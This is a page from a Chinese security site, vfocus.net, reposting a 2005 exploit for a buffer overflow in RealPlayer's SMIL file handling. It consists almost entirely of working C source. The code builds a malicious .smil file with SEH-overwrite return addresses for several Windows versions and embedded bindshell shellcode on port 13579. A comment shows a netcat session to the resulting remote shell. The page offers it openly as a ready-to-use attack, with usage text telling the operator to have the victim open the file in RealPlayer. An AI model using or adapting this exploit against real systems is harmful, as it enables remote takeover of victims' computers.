首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
RealPlayer SMIL File Handling Remote Buffer Overflow Exploit
来源:vfocus.net 作者:nolimit 发布时间:2005-03-08  

RealPlayer "SMIL" File Handling Remote Buffer Overflow Exploit

/* RealPlayer .smil file buffer overflow
Coded by nolimit@CiSO & Buzzdee
greets to COREiSO & #news & flare & class101 & ESI & RVL & everyone else I forget
This uses a seh overwrite method, which takes advantage of the SEH being placed
in multiple locations over the different OS's. Because of this, it should be
completely universal. :).
Also, we added SEH for enterprise and Standard, if you have a diff 2k3
then deal with it and write your own in.

C:\tools>nc -vv SERVER 1554
SERVER [192.168.1.93] 1554 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Program Files\Real\RealPlayer>

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char pre[]=
"<smil>\n"
" <head>\n"
" <layout>\n"
" <region id=\"a\" top=\"5\" />\n"
" </layout>\n"
" </head>\n"
" <body>\n"
" <text src=\"1024_768.en.txt\" region=\"size\" system-screen-size=\"";

char shellcode[]=
/* bindshell port 13579 thx to metasploit.com :)
restricted chars: 0x00, 0x90, 0xa0, 0x20, 0x0a, 0x0d, 0x3c, 0x3e,
0x2f, 0x5c, 0x22, 0x58, 0x3d, 0x3b */
"\x29\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8f"
"\x35\x37\x85\x83\xeb\xfc\xe2\xf4\x73\x5f\xdc\xca\x67\xcc\xc8\x7a"
"\x70\x55\xbc\xe9\xab\x11\xbc\xc0\xb3\xbe\x4b\x80\xf7\x34\xd8\x0e"
"\xc0\x2d\xbc\xda\xaf\x34\xdc\x66\xbf\x7c\xbc\xb1\x04\x34\xd9\xb4"
"\x4f\xac\x9b\x01\x4f\x41\x30\x44\x45\x38\x36\x47\x64\xc1\x0c\xd1"
"\xab\x1d\x42\x66\x04\x6a\x13\x84\x64\x53\xbc\x89\xc4\xbe\x68\x99"
"\x8e\xde\x34\xa9\x04\xbc\x5b\xa1\x93\x54\xf4\xb4\x4f\x51\xbc\xc5"
"\xbf\xbe\x77\x89\x04\x45\x2b\x28\x04\x75\x3f\xdb\xe7\xbb\x79\x8b"
"\x63\x65\xc8\x53\xbe\xee\x51\xd6\xe9\x5d\x04\xb7\xe7\x42\x44\xb7"
"\xd0\x61\xc8\x55\xe7\xfe\xda\x79\xb4\x65\xc8\x53\xd0\xbc\xd2\xe3"
"\x0e\xd8\x3f\x87\xda\x5f\x35\x7a\x5f\x5d\xee\x8c\x7a\x98\x60\x7a"
"\x59\x66\x64\xd6\xdc\x66\x74\xd6\xcc\x66\xc8\x55\xe9\x5d\x02\x8e"
"\xe9\x66\xbe\x64\x1a\x5d\x93\x9f\xff\xf2\x60\x7a\x59\x5f\x27\xd4"
"\xda\xca\xe7\xed\x2b\x98\x19\x6c\xd8\xca\xe1\xd6\xda\xca\xe7\xed"
"\x6a\x7c\xb1\xcc\xd8\xca\xe1\xd5\xdb\x61\x62\x7a\x5f\xa6\x5f\x62"
"\xf6\xf3\x4e\xd2\x70\xe3\x62\x7a\x5f\x53\x5d\xe1\xe9\x5d\x54\xe8"
"\x06\xd0\x5d\xd5\xd6\x1c\xfb\x0c\x68\x5f\x73\x0c\x6d\x04\xf7\x76"
"\x25\xcb\x75\xa8\x71\x77\x1b\x16\x02\x4f\x0f\x2e\x24\x9e\x5f\xf7"
"\x71\x86\x21\x7a\xfa\x71\xc8\x53\xd4\x62\x65\xd4\xde\x64\x5d\x84"
"\xde\x64\x62\xd4\x70\xe5\x5f\x28\x56\x30\xf9\xd6\x70\xe3\x5d\x7a"
"\x70\x02\xc8\x55\x04\x62\xcb\x06\x4b\x51\xc8\x53\xdd\xca\xe7\xed"
"\xf1\xed\xd5\xf6\xdc\xca\xe1\x7a\x5f\x35\x37\x85";


char end[]=
" </body>"
"</smil>";

char overflow[1700];
int main(int argc,char *argv[])
{

FILE *vuln;
if(argc == 1)
{
printf("RealPlayer 10 .smil file local buffer overflow.\n");
printf("Coded by nolimit & buzzdee.\n");
printf("Usage: %s <outputfile>\n",argv[0]);
return 1;
}
vuln = fopen(argv[1],"w");
//build overflow buffer here.
memset(overflow,0x90,sizeof(overflow)); //fill with nops
memcpy(overflow+1068,"\xeb\x08\xeb\x08",4); //
memcpy(overflow+1072,"\x4a\xe1\xc9\x61",4); // se handler in win xp
(pop pop ret)
memcpy(overflow+1084,"\xeb\x08\xeb\x08",4); //
memcpy(overflow+1088,"\xae\x7f\xA2\x60",4); // se handler in win2k3
(pop pop ret) for small biz or something
memcpy(overflow+1100,"\xeb\x08\xeb\x08",4); //
memcpy(overflow+1104,"\xae\x7f\xA2\x60",4); // se handler in win2k3
(pop pop ret) enterprise
memcpy(overflow+1108,"\xeb\x08\xeb\x08",4); //jump +8 into nops
memcpy(overflow+1112,"\xbf\xbb\xA2\x60",4); //overwrite seh (win2k)
with call ebx (pncrt.dll - hopefully universal ...^^)
memcpy(overflow+1125,shellcode,sizeof(shellcode)); //our shellcode
after some nope to land in

if(vuln)
{
//Write file
fprintf(vuln,"%s%s\"/>\n%s",pre,overflow,end);
fclose(vuln);
}
printf("File written.Binds a shell on port 13579.\nOpen with realplayer to exploit.\n");
return 0;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Windows XP/2003 Remo
·Buffer Overflow in Knet
·Computer Associates License So
·paNews v2.0b4 Remote SQL Injec
·Forum-Aztek v4.0 myadmin.php R
·Ethereal v0.10.9 RADIUS Auth.
·CA License Server GETCONFIG Re
·Internet Explorer CSS File Rem
·CA License Client GETCONFIG Re
·Ethereal 3G Remote Buffer Over
·TrackerCam PHP Argument Remote
·SocialMPN Arbitrary File Injec
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved